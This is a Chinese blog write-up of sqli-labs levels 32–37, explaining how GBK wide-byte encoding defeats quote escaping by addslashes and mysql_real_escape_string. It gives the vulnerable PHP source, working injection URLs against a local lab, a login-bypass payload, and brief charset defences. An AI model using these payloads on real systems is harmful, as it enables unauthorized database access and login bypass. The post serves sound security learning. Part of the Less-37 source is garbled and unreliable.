Sqli-labs Less32-37 宽字节注入绕过过滤函数

最新推荐文章于 2024-07-03 19:52:18 发布
最新推荐文章于 2024-07-03 19:52:18 发布
阅读量2.2k 收藏 6
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81563451
版权

本文记录 SQL 注入的学习过程,资料为 SQLi

SQLi 博客目录

Less - 32: GET - Bypass custom filter adding slashes to dangerous chasrs

  1. 原理

    mysql 在使用GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个ascii 码大于128 才能到汉字的范围)。我们在过滤’ 的时候,往往利用的思路是将’ 转换为’ (转换的函数或者思路会在每一关遇到的时候介绍)。

    1. %df 吃掉 \ 具体的原因是 urlencode(’) = %5c%27,我们在 %5c%27 前面添加 %df,形成 %df%5c%27,而上面提到的 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,此事 %df%5c 就是一个汉字,%27 则作为一个单独的符号在外面,同时也就达到了我们的目的。
    2. 将 ’ 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 的情况,后面的 %5c 会被前面的 %5c 给注释掉。这也是bypass 的一种方法。

  2. 注入思路

    将’ 前面添加的\ 除掉,一般有两种思路:

    urlencode(’) = %5c%27,我们在 %5c%27 前面添加 %df,形成 %df%5c%27,而上面提到的 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,此事 %df%5c 就是一个汉字,%27 则作为一个单独的符号在外面,同时也就达到了我们的目的。

  3. 源代码

     function check_addslashes($string)
 {
     $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
     $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
     $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
     return $string;
 }

 mysql_query("SET NAMES gbk");
 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);

  4. 测试

    使用 %df%27 显示

     http://10.10.10.137/sqli-labs/Less-32/?id=-1%df%27union select 1,user(),3--+

    \ 的编码为 %5c,%df 结合 %5c 会形成一个汉字

Less - 33: GET - Bypass addslashes()

  1. 原理

    addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
    过滤:

     单引号(')
 双引号(")
 反斜杠(\)

  2. 源代码

     function check_addslashes($string)
 {
     $string= addslashes($string);
     return $string;
 }
 
 $id=check_addslashes($_GET['id']);
 mysql_query("SET NAMES gbk");
 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);

  3. 测试

    提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。

    Addslashes()函数和我们在32 关实现的功能基本一致的,所以我们依旧可以利用 %df 进行绕过。

    Notice:使用 addslashes(),我们需要将 mysql_query 设置为 binary 的方式,才能防御此漏洞。

     Mysql_query("SET character_set_connection=gbk,character_set_result=gbk,character_set_client=binary",$conn);

    使用 %df%27 使 %df 与 %5c 结合然后显示 %27

     http://10.10.10.137/sqli-labs/Less-33/?id=-1%df%27union select 1,user(),3--+

    \ 的编码为 %5c,%df 结合 %5c 会形成一个汉字

Less - 34: POST - Bypass addslashes()

  1. 原理

    本关是 post 型的注入漏洞,同样的也是将post 过来的内容进行了 ‘’ 的处理。由上面的例子可以看到我们的方法就是将过滤函数添加的 \ 给吃掉。而 get 型的方式我们是以 url 形式提交的,因此数据会通过URLencode,如何将方法用在 post 型的注入当中,我们此处介绍一个新的方法。

    将 utf-8 转换为 utf-16 或 utf-32,例如将 ’ 转为 utf-16 为 %EF%BF%BD% 。我们就可以利用这个方式进行尝试。

    我们用万能密码的方式的来突破这一关。

  2. 测试

     在 username 输入 %EF%BF%BD'or 1=1#
 在 password 输入 任意

  3. 源代码

     $uname = addslashes($uname1);
 $passwd= addslashes($passwd1);

 mysql_query("SET NAMES gbk");
 @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);

    构造后的 sql 语句为

     SELECT username, password FROM users WHERE username='%EF%BF%BD' or 1=1#' and password='$passwd' LIMIT 0,1

    Explain:

    SELECT username, password FROM users WHERE username=’%EF%BF%BD’ or 1=1 起到作用,后面的则被#注释掉了。而起作用的的语句不论select 选择出来的内容是什么与 1=1 进行 or 操作后,始终是1。

Less - 35: GET - Bypass addslashes(we don’t need them) Integer based

  1. 源代码

     function check_addslashes($string)
 {
     $string = addslashes($string);
     return $string;
 }

 $id=check_addslashes($_GET['id']);
 mysql_query("SET NAMES gbk");
 $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);

    35 关和 33 关是大致的一样的,区别就是id 没有被 ’ 符号包括起来,那我们就没有必要去考虑check_addslashes() 函数的意义了

  2. 测试

     http://10.10.10.137/sqli-labs/Less-35/?id=-1%20%20union%20select%201,user(),3--+

在这里插入图片描述

Less - 36: GET - Bypass MySQL_real_eacape_string

  1. 源代码

     function check_quotes($string)
 {
 	$string= mysql_real_escape_string($string);
 	return $string;
 }
 
 $id=check_quotes($_GET['id']);
 mysql_query("SET NAMES gbk");
 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);

  2. 原理

    mysql_real_escape_string() 函数

     \x00
 \n
 \r
 \
 '
 "
 \x1a

    如果成功,则该函数返回被转义的字符串。如果失败,则返回false。

    但是因 mysql 我们并没有设置成 gbk,所以 mysql_real_escape_string() 依旧能够被突破。方法和上述是一样的

  3. 测试

     http://10.10.10.137/sqli-labs//Less-36/?id=-1%EF%BF%BD%27union select 1,user(),3--+

    在这里插入图片描述

    这个我们利用的 ’ 的 utf-16 进行突破的,我们也可以利用 %df 进行。

     http://10.10.10.137/sqli-labs/Less-36/?id=-1%df%27union select 1,user(),3--+

    在这里插入图片描述

  4. 防御

    在使用 mysql_real_escape_string() 时,如何能够安全的防护这种问题,需要将 mysql 设置为 gbk 即可。

    设置代码:

     Mysql_set_charset('gbk','$conn')

Less - 37: POST - Bypass MySQL_real_escape_string

  1. 原理

    本关与 34 关是大致相似的,区别在于处理 post 内容用的是 mysql_real_escape_string()函数,而不是 addslashes()函数,但是原理是一直的,上面我们已经分析过原理了,这里就不进行赘述了。

    利用万能密码的思路进行突破。

  2. 源代码

    mysql_query(“SET NAMES gbk”);
    @ s q l = " S E L E C T u s e r n a m e , p a s s w o r d F R O M u s e r s W H E R E u s e r n a m e = ′ sql="SELECT username, password FROM users WHERE username=' sql="SELECTusername,passwordFROMusersWHEREusername=uname’ and password=’$passwd’ LIMIT 0,1";
    r e s u l t = m y s q l q u e r y ( result=mysql_query( result=mysqlquery(sql);
    r o w = m y s q l f e t c h a r r a y ( row = mysql_fetch_array( row=mysqlfetcharray(result);

  3. 总结

    可以总结一下过滤 ’ 常用的三种方式是直接 replace(),addslashes(),mysql_real_escape_string()。三种方式仅仅依靠一个函数是不能完全防御的,所以我们在编写代码的时候需要考虑的更加仔细。同时在上述过程中,我们也给出三种防御的方式,相信仔细看完已经明白了,这里就不赘述了。

网络安全打工人
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入——宽字节注入
weixin_74991270的博客
10-10 488
1.转义符“\”有些符号想让他当作单纯的字符,而不是当作符号的时候,一般可以用: \符号比如:\’ \\’   这种情况下,‘和"将被当作正常的字符在数据库之中’与"几乎没有区别,在php之中 ’ 包括的内容完全当作字符串,而 " 包括的内容会进一步进行解析例如:$a=‘hello’;echo ‘$a’;//输出:aecho “$a”;//输出:hello2.为什么产生编码:--为了处理英文字符,产生了ASCII码。
宽字节注入
03-23 240
0x0 背景 当某字符的大小为一个字节时,称其字符为窄字节. 当某字符的大小为两个字节时,称其字符为字节. 所有英文默认占一个字节,汉字占两个字节 常见的字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等 0x1 宽字节注入原理 程序员为了防止sql注入,对用户输入中的单引号(’)进行处理,在单引号前加上斜杠(\)进行转义...
SQLi-Labs 第32
最新发布
rp114514的博客
07-03 175
注入单引号闭合时被反斜杠转义,查看源码发现简单过滤。通过检查编码设置,尝试利用字节绕过。原理是利用数据库和页面编码不同:PHP请求MySQL时经过GBK编码,并进行魔术引号处理。由于GBK是双字节编码,提交的%df字符和反斜杠组成新汉字,数据库按GBK处理后,单引号逃逸。实训课上我们进行了SQLi-Labs 第32关的挑战,在这一关中,我们将面对一个通过反斜杠转义来防御SQL注入的系统。具体来说,通过宽字节注入技术,利用数据库和页面编码不同的特点,我们可以成功逃逸出被转义的单引号,从而进行SQL注入。
sqli-labs less32
qq_45106794的博客
10-30 367
#sqli-labs less 32 这关主要是采用宽字节注入 Less-32,33,34,35,36,37 六关全部是针对’和\的过滤,所以我们放在一起来进行讨论。对宽字节注入的同学应该对这几关的 bypass 方式应该比较了解。我们在此介绍一下宽字节注入的原理和基本用法。原理:mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii ...
SQL注入 - 宽字节注入
HAKUNAMATATATTA的博客
09-05 1199
宽字节注入主要是绕过魔术引号的,数据库解析中除了UTF-8编码外的所有编码如:GBK等都有可能存在宽字节注入
sqli-labs (less-32)
kukudeshuo的博客
03-13 1993
sqli-labs (less-32) 进入32关,输入 http://127.0.0.1/sql1/Less-32/?id=1 http://127.0.0.1/sql1/Less-32/?id=1' 这里我们发现我们输入的’直接被转义成\了,在一般情况下,此处是不存在SQL注入漏洞的,不过有一个特例,就是当数据库的编码为GBK时,可以使用宽字节注入字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸,
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
(手工)【sqli-labs32-38】宽字节注入、报错回显、字符/数字型注入
07-14 807
SQL-字节、字符/数字型注入】
sqli-labs/Less-32
m0_71299382的博客
11-20 317
sqli-labs第三十二关
SQL-labs的第34关——报错注入 宽字节注入(POST)
qq_73393033的博客
08-09 372
我们发现该网站会返回报错信息,直接使用报错注入吧。发现该关还是会向危险字符自动添加斜杠。截取数据包,进行注入,输入语句。出现报错,说明单引号逃逸成功。我们发现无法中和反斜杠。
Sqli-labs之Less-37
→_→
05-07 428
Less-37 POST型 - 绕过 MYSQL_real_escape_string 本关与 34 关是大致相似的,区别在于处理 post 内容用的是 mysql_real_escape_string() 函数,而不是 addslashes()函数,但是原理是一直的, 查看源码...
sqlilabs less-32~less-37
TA不懒,但还没有添加简介
07-27 366
sqlilabs less-32~less-37
SQL注入漏洞-09】宽字节注入靶场实战
cc
02-07 5649
如果数据库使用的是DBK编码,而PHP使用的是UTF-8编码 ,那这样就可能出现注入问题。原因是程序员为了防止SQL注入,就会调用addslashes转移函数,将单引号或双引号进行转义操作,转义无非便是在单或双引号前加上转义字符(\)进行转义 ,但这样并非安全,因为数据库使用的是字节编码,两个连在一起的字符会被当做是一个汉字,而在PHP使用的UTF-8编码则认为是两个独立的字符,如果我们在单或双引号前添加一个字符,使其和转义字符(\)组合被当作一个汉字,从而保留单或双引号,成功进行宽字节注入
sqli-宽字节注入
weixin_47346400的博客
03-16 161
以下ppt来自大佬传送门 宽字节注入原理 初步探测: http://sqli-labs:65/Less-32/?id=1'-- 发现1’被转义为 ''所以判定为 宽字节注入 方法:在注入点后键入%df,然后按照正常的注入流程开始注入 原理:下图中的hint == -1�’ union select 1,2,(select user())-- ==、由于和源代码中的 ‘$id’产生闭合,所以就自然执行了 union select… 已知mysql注入的类型是字节了,下面就按照注入的基本
mysql sql宽字节注入_sqli-宽字节注入
weixin_35330796的博客
01-18 135
0x0 背景当某字符的大小为一个字节时,称其字符为窄字节.当某字符的大小为两个字节时,称其字符为字节.所有英文默认占一个字节,汉字占两个字节常见的字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等0x1 宽字节注入原理程序员为了防止sql注入,对用户输入中的单引号(’)进行处理,在单引号前加上斜杠(\)进行转义,这样被处理后的sql语句中,单引号不再具有‘作用’,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值